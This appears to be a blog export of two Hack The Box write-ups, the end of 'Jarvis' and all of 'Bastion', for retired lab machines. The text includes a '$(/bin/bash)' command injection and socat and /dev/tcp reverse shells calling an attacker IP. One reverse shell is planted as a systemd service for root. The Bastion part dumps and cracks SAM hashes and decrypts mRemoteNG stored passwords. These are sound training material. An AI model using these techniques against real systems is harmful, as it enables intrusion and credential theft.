<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo --user=pepper /var/www/Admin-Utilities/simpler.py -p
Enter an IP: $(/bin/bash)
$(/bin/bash)
pepper@jarvis:/$
</code></pre></div></div>
<p>This shell isn’t perfectly working, so it is upgraded to a full reverse shell. With nc running on port 8989, this command yields a fully functioning shell:<br />
<code class="language-plaintext highlighter-rouge">socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.15.195:8989</code></p>
<h2 id="road-to-root">Road to root</h2>
<p>Exploring privilege escalation routes, it turns out that systemctl has the <em>SETUID</em> bit set, meaning it can run with root privileges.
Creating a systemctl oneshot service that spawns a reverse shell as root is therefore possible:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[Unit]
Description=Black magic happening, avert your eyes
[Service]
RemainAfterExit=yes
Type=simple
ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.10.15.195/8888; cat <&5 | while read line; do $line 2>&5 >&5; done"
[Install]
WantedBy=default.target
</code></pre></div></div>
<p>Then make use of systemctl link to link the service file into the correct position:<br />
<code class="language-plaintext highlighter-rouge">systemctl link /home/pepper/apalax.service</code>
and enable it, therefore opening the connection to port 8888 on our Machine:<br />
<code class="language-plaintext highlighter-rouge">systemctl start --now apalax</code></p>
<p>This spawns a minimal shell that is functioning enough to print the contents of <code class="language-plaintext highlighter-rouge">root.txt</code>.</p>Writeup for the retired HTB machine Jarvis Link: https://www.hackthebox.eu/home/machines/profile/194 IP: 10.10.10.143HTB - Bastion2020-06-06T19:00:00+00:002020-06-06T19:00:00+00:00https://maddosaurus.github.io/2020/06/06/htb-bastion<p>Writeup for the retired HTB machine Bastion<br />
Link: https://www.hackthebox.eu/home/machines/profile/186<br />
IP: 10.10.10.134</p>
<!--more-->
<h2 id="recon">Recon</h2>
<p>A qick portscan reveals multiple open ports:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PORT STATE SERVICE
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
</code></pre></div></div>
<h2 id="smb">SMB</h2>
<p>A closer investigation of the SMB service reveals that it is allowing anonymous access with disabled message signing, which in turn enables public enumeration.<br />
<code class="language-plaintext highlighter-rouge">msf5 > use auxiliary/scanner/smb/pipe_auditor</code><br />
This yields some interesting endpoints:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[+] 10.10.10.134:445 - Pipes: \netlogon, \lsarpc, \samr, \atsvc, \epmapper, \eventlog, \InitShutdown, \lsass, \LSM_API_service, \ntsvcs, \protected_storage, \scerpc, \srvsvc, \trkwks, \W32TIME_ALT, \wkssvc
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">msf5 > use auxiliary/scanner/smb/smb_enumshares</code></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[-] 10.10.10.134:139 - Login Failed: Unable to Negotiate with remote host
[+] 10.10.10.134:445 - ADMIN$ - (DISK) Remote Admin
[+] 10.10.10.134:445 - Backups - (DISK)
[+] 10.10.10.134:445 - C$ - (DISK) Default share
[+] 10.10.10.134:445 - IPC$ - (IPC) Remote IPC
</code></pre></div></div>
<p>So let’s look into the shares.
First, let’s mount the Backups share:<br />
<code class="language-plaintext highlighter-rouge">sudo mount -t cifs -o user=guest //10.10.10.134/Backups /mnt/</code>
There’s a Backup of a full client machine at <code class="language-plaintext highlighter-rouge">WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351</code> to be discovered.</p>
<h2 id="the-backup">The Backup</h2>
<p>This VHD, copied and then mounted on Linux enabled closer investigation:
<code class="language-plaintext highlighter-rouge">sudo guestmount -a 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd -i --ro /mnt/guest/</code></p>
<p>With an unbooted Windows installation like this, it is possible to copy registry hives from <code class="language-plaintext highlighter-rouge">C:\Windows\system32\config\</code> and dump the NTHash for the users:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>apalax@raudfjorden:~/writeups/HTB/Labs/Bastion$ pwdump SYSTEM SAM
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
</code></pre></div></div>
<p>The syntax for these hashes is <code class="language-plaintext highlighter-rouge">username:id:LM-Hash:NT-Hash</code>. These are then copied into <code class="language-plaintext highlighter-rouge">hashes.txt</code> and handed off to john for a dictionary attack:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>john --format=nt hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
(Administrator)
bureaulampje (L4mpje)
2g 0:00:00:00 DONE (2019-09-05 19:36) 2.222g/s 10439Kp/s 10439Kc/s 10444KC/s burg772v..burdy1
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed
</code></pre></div></div>
<p>So it seems we have a user login / password combination.<br />
If we connect via SSH, we’re dropped into a CMD (?).<br />
<code class="language-plaintext highlighter-rouge">user.txt</code> can be found at the desktop and printed with <code class="language-plaintext highlighter-rouge">type user.txt</code>.</p>
<h2 id="road-to-root">Road to root</h2>
<p>A try was to make use of Matt Graebers tool, Powersploit.</p>
<p>First, Powersploit needs to be downloaded:<br />
<code class="language-plaintext highlighter-rouge">wget http://10.10.15.195:8000/PowerSploit-3.0.0.zip -OutFile ps.zip</code><br />
So download the Privesc folder into the PS Module path, import the module and run:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Import-Module Privesc
Get-Command -Module Privesc
<available commands>
Invoke-AllChecks
<stuff stuff>
(...)
[*] Checking %PATH% for potentially hijackable .dll locations...
HijackablePath : C:\Users\L4mpje\AppData\Local\Microsoft\WindowsApps\
AbuseFunction : Write-HijackDll -OutputFile 'C:\Users\L4mpje\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll' -Command '...'
</code></pre></div></div>
<p>Which seems to not work. Poking around shows an SSH config file reveals:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Match Group administrators
AuthorizedKeysFile __PROGRAMDATA__/ssh/administrators_authorized_keys
</code></pre></div></div>
<p>unfortunately, we don’t have write access to that folder as user, so another path for privilege escalation is needed.</p>
<h3 id="mremoteng">mRemoteNG</h3>
<p>A more thorough investigation reveals that mRemoteNG is installed, a remote administration tool.<br />
On closer examination it is revealed that this software suffers from insecure password storage issues.<br />
The credentials are stored in a <code class="language-plaintext highlighter-rouge">connection.xml</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PS C:\Users\L4mpje\AppData\Roaming\mRemoteNG> type .\confCons.xml
</code></pre></div></div>
<p>Which can be decrypted with <a href="https://github.com/haseebT/mRemoteNG-Decrypt">mremoteng-decrypt</a>.<br />
This is done by providing the decrypter the administrator password hash:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2
</code></pre></div></div>
<p>This yields the password for the Administrator account. Connect, <code class="language-plaintext highlighter-rouge">cd</code> to Desktop and print the flag with <code class="language-plaintext highlighter-rouge">type root.txt</code>.</p>Writeup for the retired HTB machine Bastion Link: https://www.hackthebox.eu/home/machines/profile/186 IP: 10.10.10.134